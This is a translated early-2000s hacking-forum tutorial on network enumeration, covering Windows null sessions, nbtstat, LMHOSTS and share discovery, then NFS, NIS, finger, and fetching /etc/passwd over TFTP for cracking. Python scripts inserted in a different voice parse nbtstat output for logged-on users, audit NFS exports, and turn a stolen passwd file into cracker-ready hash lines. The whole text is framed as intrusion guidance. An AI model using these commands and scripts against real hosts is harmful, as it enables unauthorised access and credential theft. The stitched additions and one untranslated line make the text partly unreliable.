Quote: http://www.hacker.org.tw/?c=articles_show&articleid=39

Posted by: Kozxer   Posted on: 2003-10-20 20:43

A Short Summary of System and Network Intrusion Methods
Author: 霧中鳥
Declaration: this article was written from a number of books and related articles on the net, combined with my own experience and knowledge. It may not be used for commercial purposes without my permission; violators will be held legally responsible!
Chapter 3: Enumeration
1. Windows NT/2000 enumeration: Windows was designed to make resource lookup convenient, so enumerating a whole domain and its systems is very easy.
Net view is a telling example. First, enumerate the domains on the network:
C:\>net view /domain
Domain
-------------------------------------------------------------------------------
CORLEONE
BARZINI_DOMAIN
TATAGGLIA_DOMAIN
BARZZI
The command completed successfully.
Next, list the computers in a particular domain:
C:\>net view /domain:corleone
Server Name            Remark
-------------------------------------------------------------------------------
\\VITO                 Make him an offer he can't refuse
\\MICHAEL              Nothing personal
\\SONNY                Badda bing badda boom
\\FREDO                I'm smart
\\CONNIE               Don't forget the canoli
Then query for the NT domain controllers. The nltest tool (from the NT/2000 Resource Kit / Support Tools) identifies the primary and backup domain controllers:
C:\>nltest /dclist:corleone
List of DCs in Domain corleone
    \\VITO (PDC)
    \\MICHAEL
    \\SONNY
The command completed successfully
From the output above we know that the target's Primary Domain Controller (PDC) is VITO.
Microsoft left a blunder in Windows NT/2000: the weakness known as "Red Button", the null-session connection, which allows anonymous logon to a host. This undeniably gives an attacker a good foothold:
net use \\192.168.202.33\IPC$ "" /user:""
(Both the password and the user name are empty. On NT4 SP3 and later, and on 2000, the RestrictAnonymous value under HKLM\SYSTEM\CurrentControlSet\Control\LSA limits what such a session is allowed to enumerate, so the steps below may return less on a hardened host.)
Once the null session is established, we can use net view over NetBIOS to list the shares that exist on the host:
C:\>net view \\vito
Shared resources at \\192.168.7.45
VITO
Share name   Type   Used as   Comment
-------------------------------------------------------------------------------
NETLOGON     Disk             Logon server share
Test         Disk             Public access
The command completed successfully
So there is a real risk of exposing shared resources; as for how to exploit that, I am sure anyone with some understanding of network security knows what to do. While we are at it, here are some methods for intruding via port 139:
First, use the nbtstat tool that ships with Windows to find out the NetBIOS names (including logged-on user names) registered on the host:
C:\>nbtstat -A 192.168.202.33
NetBIOS Remote Machine Name Table
Name               Type     Status
-------------------------------------------------------------------------
SANTINO          <20>  UNIQUE  Registered
SANTINO          <00>  UNIQUE  Registered
INTERNET         <20>  GROUP   Registered
SANTINO          <03>  UNIQUE  Registered
INTERNET         <1E>  GROUP   Registered
SANTINO          <20>  UNIQUE  Registered
ADMINISTRATOR    <03>  UNIQUE  Registered
INTERNET         <1D>  UNIQUE  Registered
..__MSBROWSE__.. <01>  GROUP   Registered
MAC Address = 00-C0-4F-86-80-05
Everyone can see SANTINO in the first column, right? That is the host's name, and it is the name we are about to use. Reading the table more carefully: the SANTINO <00> UNIQUE record is the workstation (machine) name, the INTERNET <1E>/<1D> records give its workgroup or domain, and a <03> UNIQUE record registered under a name other than the machine's, ADMINISTRATOR here, is the Messenger registration of a user currently logged on. In the Windows directory (on NT/2000: %SystemRoot%\system32\drivers\etc) there is a file Lmhosts.sam with the following content:
# Copyright (c) 1998 Microsoft Corp.
#
# This is a sample LMHOSTS file used by the Microsoft Wins Client (NetBios
# over TCP/IP) stack for Windows98
#
# This file contains the mappings of IP addresses to NT computernames
# (NetBIOS) names. Each entry should be kept on an individual line.
# The IP address should be placed in the first column followed by the
# corresponding computername. The address and the computername
# should be separated by at least one space or tab. The "#" character
# is generally used to denote the start of a comment (see the exceptions
# below).
#
# This file is compatible with Microsoft LAN Manager 2.x TCP/IP lmhosts
# files and offers the following extensions:
#
# #PRE
# #DOM:<domain>
# #INCLUDE <filename>
# #BEGIN_ALTERNATE
# #END_ALTERNATE
# \0xnn (non-printing character support)
#
# Following any entry in the file with the characters "#PRE" will cause
# the entry to be preloaded into the name cache. By default, entries are
# not preloaded, but are parsed only after dynamic name resolution fails.
#
# Following an entry with the "#DOM:<domain>" tag will associate the
# entry with the domain specified by <domain>. This affects how the
# browser and logon services behave in TCP/IP environments. To preload
# the host name associated with #DOM entry, it is necessary to also add a
# #PRE to the line. The <domain> is always preloaded although it will not
# be shown when the name cache is viewed.
#
# Specifying "#INCLUDE <filename>" will force the RFC NetBIOS (NBT)
# software to seek the specified <filename> and parse it as if it were
# local. <filename> is generally a UNC-based name, allowing a
# centralized lmhosts file to be maintained on a server.
# It is ALWAYS necessary to provide a mapping for the IP address of the
# server prior to the #INCLUDE. This mapping must use the #PRE directive.
# In addition the share "public" in the example below must be in the
# LanManServer list of "NullSessionShares" in order for client machines to
# be able to read the lmhosts file successfully. This key is under
# \machine\system\currentcontrolset\services\lanmanserver\parameters\nullsessionshares
# in the registry. Simply add "public" to the list found there.
#
# The #BEGIN_ and #END_ALTERNATE keywords allow multiple #INCLUDE
# statements to be grouped together. Any single successful include
# will cause the group to succeed.
#
# Finally, non-printing characters can be embedded in mappings by
# first surrounding the NetBIOS name in quotations, then using the
# \0xnn notation to specify a hex value for a non-printing character.
#
# The following example illustrates all of these extensions:
#
# 102.54.94.97 rhino #PRE #DOM:networking #net group's DC
# 102.54.94.102 "appname \0x14" #special app server
# 102.54.94.123 popular #PRE #source server
# 102.54.94.117 localsrv #PRE #needed for the include
#
# #BEGIN_ALTERNATE
# #INCLUDE \\localsrv\public\lmhosts
# #INCLUDE \\rhino\public\lmhosts
# #END_ALTERNATE
#
# In the above example, the "appname" server contains a special
# character in its name, the "popular" and "localsrv" server names are
# preloaded, and the "rhino" server name is specified so it can be used
# to later #INCLUDE a centrally maintained lmhosts file if the "localsrv"
# system is unavailable.
#
# Note that the whole file is parsed including comments on each lookup,
# so keeping the number of comments to a minimum will improve performance.
# Therefore it is not advisable to simply add lmhosts file entries onto the
# end of this file.
That is roughly what the file describes. We can delete its contents and write a line in the following format:
192.168.202.33 SANTINO
Note: there is a space between the IP and SANTINO. Save it, then rename the file to Lmhosts with no extension. Finally, open Find -> Computer, enter the machine name or IP address, and the host will be found; double-click it to open the host. Using Run -> \\ip works the same way. What you can actually open still depends on the share permissions: a null session guarantees you the share list, not the contents of every share.
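The nbtstat and LMHOSTS steps above are easier to apply at scale with a parser that decodes the NetBIOS suffixes and emits the LMHOSTS line. The block below is an added example, not code from the original article: the sample table is constructed from the listing in the text, and the suffix meanings are the standard NetBIOS suffix assignments (a suffix means different things for UNIQUE and GROUP records).

```python
"""Decode a `nbtstat -A` NetBIOS name table and derive the LMHOSTS entry."""
import re

# Standard NetBIOS suffixes; (suffix, record kind) -> meaning.
SUFFIXES = {
    ("00", "UNIQUE"): "workstation service (machine name)",
    ("00", "GROUP"): "domain or workgroup name",
    ("01", "GROUP"): "master browser (__MSBROWSE__)",
    ("03", "UNIQUE"): "messenger service (machine name or logged-on user)",
    ("1B", "UNIQUE"): "domain master browser (PDC)",
    ("1C", "GROUP"): "domain controllers",
    ("1D", "UNIQUE"): "master browser",
    ("1E", "GROUP"): "browser service elections",
    ("20", "UNIQUE"): "file server service",
}

# Matches "NAME <xx> UNIQUE|GROUP Registered"; the name may contain dots.
RECORD_RE = re.compile(r"^\s*(\S.*?)\s*<([0-9A-Fa-f]{2})>\s*(UNIQUE|GROUP)\s+(\S+)\s*$")
MAC_RE = re.compile(r"MAC Address\s*=\s*([0-9A-Fa-f]{2}(?:-[0-9A-Fa-f]{2}){5})")

# Constructed sample, copied from the nbtstat listing in the text.
SAMPLE = """\
       NetBIOS Remote Machine Name Table

   Name               Type         Status
---------------------------------------------
SANTINO        <20>  UNIQUE      Registered
SANTINO        <00>  UNIQUE      Registered
INTERNET       <20>  GROUP       Registered
SANTINO        <03>  UNIQUE      Registered
INTERNET       <1E>  GROUP       Registered
ADMINISTRATOR  <03>  UNIQUE      Registered
INTERNET       <1D>  UNIQUE      Registered
..__MSBROWSE__.<01>  GROUP       Registered

MAC Address = 00-C0-4F-86-80-05
"""


def parse_nbtstat(text):
    """Return ([(name, suffix, kind, status)], mac) from nbtstat -A output."""
    records, mac = [], None
    for line in text.splitlines():
        m = RECORD_RE.match(line)
        if m:
            name, suffix, kind, status = m.groups()
            records.append((name, suffix.upper(), kind, status))
            continue
        m = MAC_RE.search(line)
        if m:
            mac = m.group(1).upper()
    return records, mac


def summarize(text):
    """Pull out what an attacker cares about: host, domain, logged-on users, roles."""
    records, mac = parse_nbtstat(text)
    hostname = next((n for n, s, k, _ in records if (s, k) == ("00", "UNIQUE")), None)
    domains = sorted({n for n, s, k, _ in records if k == "GROUP" and s in ("00", "1C", "1E")})
    # A <03> UNIQUE record under a name other than the machine's is the
    # Messenger registration of a logged-on user (ADMINISTRATOR in the sample).
    users = sorted({n for n, s, k, _ in records if (s, k) == ("03", "UNIQUE") and n != hostname})
    roles = sorted({SUFFIXES[(s, k)] for _, s, k, _ in records
                    if (s, k) in SUFFIXES and s in ("01", "1B", "1C", "1D", "20")})
    return {"hostname": hostname, "domains": domains, "users": users,
            "roles": roles, "mac": mac}


def lmhosts_entry(ip, hostname, preload=False):
    """The one-line LMHOSTS mapping the text has you write; #PRE preloads it."""
    return f"{ip} {hostname}" + (" #PRE" if preload else "")


if __name__ == "__main__":
    info = summarize(SAMPLE)
    for key, value in info.items():
        print(f"{key:9}: {value}")
    print(lmhosts_entry("192.168.202.33", info["hostname"]))
```

Run it against saved `nbtstat -A` output for each host in the domain listing and the logged-on user names fall out without any null session at all; the same records also tell you which machine is the master browser, which is where you point the next `net view`.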
2. UNIX enumeration: most modern UNIX implementations rely on TCP/IP networking, so they do not leak information as casually as NT/2000 does through its legacy NetBIOS interface. That does not mean, however, that UNIX is immune to enumeration techniques.
UNIX has a utility called showmount, which is useful for enumerating the file systems a host exports via NFS on a given network. An example:
[japleak@root]$ showmount -e 192.168.202.34
export list for 192.168.202.34:
/pub (everyone)
/var (everyone)
/usr user
The -e switch asks the specified NFS server for its export list. Unfortunately there is little that can be done to plug this hole, because it is NFS's default behaviour: mountd answers this query for anyone who can reach the portmapper. What can be done is to restrict each export to named hosts or networks in /etc/exports instead of exporting to everyone, and to filter the portmapper (111) and NFS (2049) ports at the perimeter.
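The export list above is only dangerous where it says "(everyone)". The block below is an added example, not part of the original article: it extracts the world-exported paths from showmount output and audits an /etc/exports file for the same mistake, showing a weak file beside its hardened form. Both exports samples are constructed and use Linux nfs-utils syntax (other NFS servers use different exports formats).

```python
"""Find world-exported NFS file systems, from showmount -e output or /etc/exports."""
import re

# Constructed sample mirroring the showmount -e listing in the text.
SHOWMOUNT = """\
export list for 192.168.202.34:
/pub (everyone)
/var (everyone)
/usr user
"""

# Weak: an empty host field and "*" both mean "everyone"; /var additionally
# lets root on any client act as root on the server (no_root_squash).
WEAK_EXPORTS = """\
/pub    (ro)
/var    *(rw,no_root_squash)
/usr    user(ro)
"""

# Hardened: every export limited to a host or network, root squashed.
HARDENED_EXPORTS = """\
/pub    192.168.202.0/24(ro,root_squash)
/var    192.168.202.10(rw,root_squash)
/usr    user(ro)
"""

# "host(opt,opt)" or "host" or "(opt,opt)" with an empty host.
CLIENT_RE = re.compile(r"^([^(]*)(?:\((.*)\))?$")


def world_exports_from_showmount(text):
    """Paths that `showmount -e` reports as exported to everyone."""
    paths = []
    for line in text.splitlines():
        parts = line.split(None, 1)
        if len(parts) != 2 or not parts[0].startswith("/"):
            continue  # header line or something we do not understand
        path, clients = parts
        if clients.strip() in ("(everyone)", "*"):
            paths.append(path)
    return paths


def parse_exports(text):
    """Return [(path, [(host, {options}), ...])] for an nfs-utils exports file."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        path, clients = fields[0], fields[1:] or ["*"]  # bare path == everyone
        parsed = []
        for client in clients:
            m = CLIENT_RE.match(client)
            if not m:
                continue
            host, opts = m.groups()
            parsed.append((host, {o for o in (opts or "").split(",") if o}))
        entries.append((path, parsed))
    return entries


def audit_exports(text):
    """List (path, host, problem) tuples an attacker would love to see."""
    findings = []
    for path, clients in parse_exports(text):
        for host, opts in clients:
            everyone = host in ("", "*")
            if everyone:
                findings.append((path, host, "exported to everyone"))
            if everyone and "rw" in opts:
                findings.append((path, host, "writable by everyone"))
            if "no_root_squash" in opts:
                findings.append((path, host, "no_root_squash"))
    return findings


if __name__ == "__main__":
    print("world exports:", world_exports_from_showmount(SHOWMOUNT))
    for finding in audit_exports(WEAK_EXPORTS):
        print("weak:", finding)
    print("hardened findings:", audit_exports(HARDENED_EXPORTS))
```

Note that `exportfs -v` on the server shows the effective options (including the root_squash default) rather than the file text, so when auditing a live host compare both.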
Another potential source of UNIX network information is NIS. The main problem with NIS is that once you know a server's NIS domain name, you can retrieve the contents of any of its NIS maps with simple RPC queries (ypcat, for instance). The NIS maps are distributed mappings of key information about every host in the domain, the passwd map included.
Next, the UNIX utility finger. finger is a simple way to automatically fetch user information from a remote host, and quite a few administrators unwittingly leave fingerd running in its insecure default configuration. The example below assumes we earlier identified a live host running the finger service (port 79):
[japleak@root]$ finger -l @target.hackme.com
[target.hackme.com]
Login: root                             Name: root
Directory: /root                        Shell: /bin/bash
On since Sun Mar 28 11:01 (PST) on tty1   11 minutes idle
     (messages off)
On since Sun Mar 28 11:01 (PST) on ttyp0 from :0.0
     3 minutes 6 seconds idle
No mail.
Plan:
John Smith
Security Guru
Telnet password is my birthdate.
"finger 0@hostname"命令也會給出有用信息:
[japleak@root]$finger 0@192.168.202.34
[192.168.202.34]
Line User Host(S) ldle Location
* 2 vty 0 idle 0 192.168.202.14
Se0 Sync PPP 00:00:02
The goal underlying all of these UNIX enumeration techniques, however, is to get hold of the /etc/passwd file. TFTP (Trivial File Transfer Protocol) deserves a mention here as one of the most popular ways of grabbing the passwd file: TFTP has no authentication at all, and older tftpd daemons were not confined to a single directory, so any world-readable file could be requested by path:
[japleak@root]$ tftp 192.168.202.34
tftp> connect 192.168.202.34
tftp> get /etc/passwd /tmp/passwd.cracklater
tftp> quit
Besides feeding this file to a password cracker, user information can be read straight out of it. If passwords are shadowed, the second field is just "x" or "*" and the hashes live in /etc/shadow, which is not world-readable and which TFTP will not normally hand over.
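What "reading user information directly" from the file means in practice is a triage pass: which accounts are uid 0, which can log in interactively, which have no password at all, and which still carry a hash in passwd itself. The block below is an added example, not code from the original article; SAMPLE_PASSWD is constructed, and the jsmith hash is a placeholder in crypt format, not a real hash.

```python
"""Triage an /etc/passwd file grabbed from a target."""

NOLOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false",
                  "/bin/sync", "/sbin/halt", "/sbin/shutdown"}
# Second-field values meaning "look in /etc/shadow" or "account locked".
SHADOW_MARKERS = {"x", "*", "!", "!!", "*NP*", "NP", "*LK*"}

# Constructed sample; the jsmith hash is a placeholder, not a real hash.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
toor:x:0:0:backup root:/root:/bin/sh
jsmith:$1$saltsalt$placeholderhashnotreal0000:500:500:John Smith:/home/jsmith:/bin/bash
guest::501:501:Guest:/home/guest:/bin/bash
nobody:x:99:99:Nobody:/:/sbin/nologin
+::0:0:::
"""


def parse_passwd(text):
    """Return one dict per well-formed 7-field line (comments and blanks skipped)."""
    users = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        users.append({
            "name": name, "pw": pw,
            "uid": int(uid) if uid.isdigit() else None,
            "gid": int(gid) if gid.isdigit() else None,
            "gecos": gecos, "home": home, "shell": shell,
            # "+"/"-" lines are NIS compatibility entries, not local accounts.
            "nis_compat": name[:1] in ("+", "-"),
        })
    return users


def triage(text):
    """What can be read straight out of passwd before any cracking starts."""
    users = parse_passwd(text)
    local = [u for u in users if not u["nis_compat"]]
    return {
        # Every uid 0 account is root, whatever it is called.
        "uid0": [u["name"] for u in local if u["uid"] == 0],
        "interactive": [u["name"] for u in local
                        if u["shell"] and u["shell"] not in NOLOGIN_SHELLS],
        # Empty second field: the account logs in with no password at all.
        "no_password": [u["name"] for u in local if u["pw"] == ""],
        # A hash in passwd itself: no shadow file needed, crack it directly.
        "hash_in_passwd": [u["name"] for u in local
                           if u["pw"] and u["pw"] not in SHADOW_MARKERS],
        # "+::0:0:::" style lines mean NIS users are merged in; the NIS
        # passwd map (ypcat) is then the next thing to pull.
        "nis_compat": [u["name"] for u in users if u["nis_compat"]],
    }


def crackable_lines(text):
    """user:hash lines with an in-file hash, in the form a cracker reads."""
    return [f"{u['name']}:{u['pw']}" for u in parse_passwd(text)
            if not u["nis_compat"] and u["pw"] and u["pw"] not in SHADOW_MARKERS]


if __name__ == "__main__":
    for key, names in triage(SAMPLE_PASSWD).items():
        print(f"{key:15}: {names}")
    print("\n".join(crackable_lines(SAMPLE_PASSWD)))
```

On a shadowed system the interesting lists are "uid0", "interactive" and "no_password"; "hash_in_passwd" is only non-empty on old or misconfigured hosts, which is exactly the population the TFTP trick tends to find.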
Copyright by 霧中鳥 Inc. All rights reserved.
Reprints must credit the copyright information; questions to me at japleak@263.net.
